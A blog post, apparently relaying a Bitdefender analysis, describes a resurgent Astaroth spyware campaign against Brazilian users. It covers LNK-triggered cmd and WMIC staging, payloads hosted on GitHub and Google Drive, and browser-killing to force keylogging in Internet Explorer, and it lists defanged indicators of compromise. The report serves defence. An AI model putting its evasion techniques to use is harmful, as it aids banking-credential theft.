The return of the Astaroth Spyware Trojan

Bitdefender researchers found an interesting spike in malware activity that involved the use of Microsoft binaries in the infection process, as well as the use of GitHub and Google Drive for delivering payloads.

After analyzing the detection details we were able to identify this activity as a resurgence of the Astaroth spyware, a Trojan and information stealer known since late 2017.

Astaroth was first seen in 2017 and is considered an information stealer and Trojan. This campaign “lives off the land” by using Microsoft applications in the infection process to avoid detection by normal security detection techniques.

GitHub and Google Drive are used to store and deliver the payloads after certain criteria, such as Brazilian locale set and Portuguese keyboard, are met. Once installed, Astaroth captures key strokes when Internet Explorer (IE) is used to access specific Brazilian banks and businesses. To ensure the user doesn’t use Chrome or Firefox instead, the malware will actually terminate those browsers to force the user into IE. The infection vector is a malicious archive on the Internet that the user is tricked into downloading. An enticing .LNK file, clicked by the user, begins the infection by using cmd.exe with specified parameters. WMIC is invoked to download subsequent stages, pulling the parameter file from the Internet (Google Drive or GitHub).

In the table below, we can see the geolocation statistics about the targeted users. One can easily observe that the malware campaign targets mostly users from South America, especially Brazil.

Indicators of Compromise

IP Addresses

  • 104.129.204[.]41
  • 63.251.126[.]7
  • 195.157.15[.]100
  • 173.231.184[.]59
  • 64.95.103[.]181

Domains

  • 19analiticsx00220a[.]com
  • qnccmvbrh.wilstonbrwsaq[.]pw

SHA1 File Hashes

  • 01782747C12Bf06A52704A144DB59FEC41B3CB36
  • 1F83403398964D4E8B6C70B171C51CD278909172
  • CE8BDB56CCAC55C6881701EBD39DA316EE7ED18D
  • 926137A50f473BBD257CD19E207C1C9114F6B215
  • 5579E03EB1DA076EF939196CB14F8B769F30A302
  • B2734835888756929EE3FF4DCDE85080CB299D2A
  • 206352E13D601239E2D043D971EA6657C091071A
  • EAE82A63A980998F8D388BCCE7D967F28309F593
  • 9CD5A399C9320CBFB87C9D1CAD3BC366FB12E54F
  • 206352E13D601239E2D043D971EA6657C091071A
  • 4CDE9A53A9A49D606BC89E74D47398A69E767056
  • F99319B1B321AE9F2D1F0361BC756A43D25444CE
  • B85C106B68ED410107f97A2CC38b7EC05353F1FA
  • 77809236FDF621ABE37B32BF073B0B893E9CE67A
  • B85C106B68ED410107f97A2CC38b7EC05353F1fA
  • C2F3350AC58DE900768032554C009C4A78C47CCC

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: